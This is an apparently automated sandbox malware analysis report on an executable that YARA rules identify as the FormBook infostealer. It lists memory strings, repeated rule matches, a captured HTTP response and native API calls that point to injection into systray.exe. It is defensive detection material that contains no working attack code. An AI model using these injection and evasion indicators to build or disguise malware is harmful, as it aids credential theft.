HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-storePragma: no-cacheContent-Type: text/htmlServer: IISX-Powered-By: WAF/2.0Date: Wed, 12 May 2021 05:07:40 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-si

Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419D50 NtCreateFile,	3_2_00419D50
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419E00 NtReadFile,	3_2_00419E00
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419E80 NtClose,	3_2_00419E80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419F30 NtAllocateVirtualMemory,	3_2_00419F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419D4B NtCreateFile,	3_2_00419D4B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00419DFC NtReadFile,	3_2_00419DFC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9840 NtDelayExecution,LdrInitializeThunk,	8_2_045D9840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_045D9860
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9540 NtReadFile,LdrInitializeThunk,	8_2_045D9540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_045D9910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D95D0 NtClose,LdrInitializeThunk,	8_2_045D95D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D99A0 NtCreateSection,LdrInitializeThunk,	8_2_045D99A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9A50 NtCreateFile,LdrInitializeThunk,	8_2_045D9A50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9650 NtQueryValueKey,LdrInitializeThunk,	8_2_045D9650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_045D9660
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D96D0 NtCreateKey,LdrInitializeThunk,	8_2_045D96D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_045D96E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9710 NtQueryInformationToken,LdrInitializeThunk,	8_2_045D9710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9FE0 NtCreateMutant,LdrInitializeThunk,	8_2_045D9FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9780 NtMapViewOfSection,LdrInitializeThunk,	8_2_045D9780
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045DB040 NtSuspendThread,	8_2_045DB040
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9820 NtEnumerateKey,	8_2_045D9820
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D98F0 NtReadVirtualMemory,	8_2_045D98F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D98A0 NtWriteVirtualMemory,	8_2_045D98A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9950 NtQueueApcThread,	8_2_045D9950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9560 NtWriteFile,	8_2_045D9560
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045DAD30 NtSetContextThread,	8_2_045DAD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9520 NtWaitForSingleObject,	8_2_045D9520
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D99D0 NtCreateProcessEx,	8_2_045D99D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D95F0 NtQueryInformationFile,	8_2_045D95F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9670 NtQueryInformationProcess,	8_2_045D9670
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9610 NtEnumerateValueKey,	8_2_045D9610
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9A10 NtQuerySection,	8_2_045D9A10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9A00 NtProtectVirtualMemory,	8_2_045D9A00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9A20 NtResumeThread,	8_2_045D9A20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9A80 NtOpenDirectoryObject,	8_2_045D9A80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9770 NtSetInformationFile,	8_2_045D9770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045DA770 NtOpenThread,	8_2_045DA770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9760 NtOpenProcess,	8_2_045D9760
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045DA710 NtOpenProcessToken,	8_2_045DA710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9B00 NtSetValueKey,	8_2_045D9B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D9730 NtQueryVirtualMemory,	8_2_045D9730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045DA3B0 NtGetContextThread,	8_2_045DA3B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D97A0 NtUnmapViewOfSection,	8_2_045D97A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189D50 NtCreateFile,	8_2_00189D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189E00 NtReadFile,	8_2_00189E00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189E80 NtClose,	8_2_00189E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189F30 NtAllocateVirtualMemory,	8_2_00189F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189D4B NtCreateFile,	8_2_00189D4B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00189DFC NtReadFile,	8_2_00189DFC

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B58782	1_2_00B58782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B55D17	1_2_00B55D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B54765	1_2_00B54765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_0160C1D0	1_2_0160C1D0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_01609890	1_2_01609890
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06420F30	1_2_06420F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06427C80	1_2_06427C80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_0642E228	1_2_0642E228
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06420040	1_2_06420040
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_064280F8	1_2_064280F8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_0642C1D8	1_2_0642C1D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06429600	1_2_06429600
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06421E18	1_2_06421E18
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06421E28	1_2_06421E28
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06420E38	1_2_06420E38
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_064236A9	1_2_064236A9
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_064236B8	1_2_064236B8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06427C72	1_2_06427C72
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_0642CC10	1_2_0642CC10
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_064234C8	1_2_064234C8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_064234D8	1_2_064234D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5B3F5	1_2_00B5B3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B56759	1_2_00B56759
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041D21B	3_2_0041D21B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041DBED	3_2_0041DBED
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00409DEB	3_2_00409DEB
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00409E30	3_2_00409E30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041CF96	3_2_0041CF96
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FB5D17	3_2_00FB5D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FB8782	3_2_00FB8782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FB4765	3_2_00FB4765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBB3F5	3_2_00FBB3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FB6759	3_2_00FB6759
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651002	8_2_04651002
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AB090	8_2_045AB090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04661D55	8_2_04661D55
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459F900	8_2_0459F900
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04590D20	8_2_04590D20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B6E30	8_2_045B6E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CEBB0	8_2_045CEBB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0018D21B	8_2_0018D21B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00172D90	8_2_00172D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00172D87	8_2_00172D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00179DEB	8_2_00179DEB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00179E30	8_2_00179E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0018CF96	8_2_0018CF96
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00172FB0	8_2_00172FB0

Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.237220905.0000000006230000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.280995621.0000000001068000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe, 00000003.00000002.281676487.0000000001BBF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ox87DNNM8d.exe
Source: ox87DNNM8d.exe	Binary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe

Source: ox87DNNM8d.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
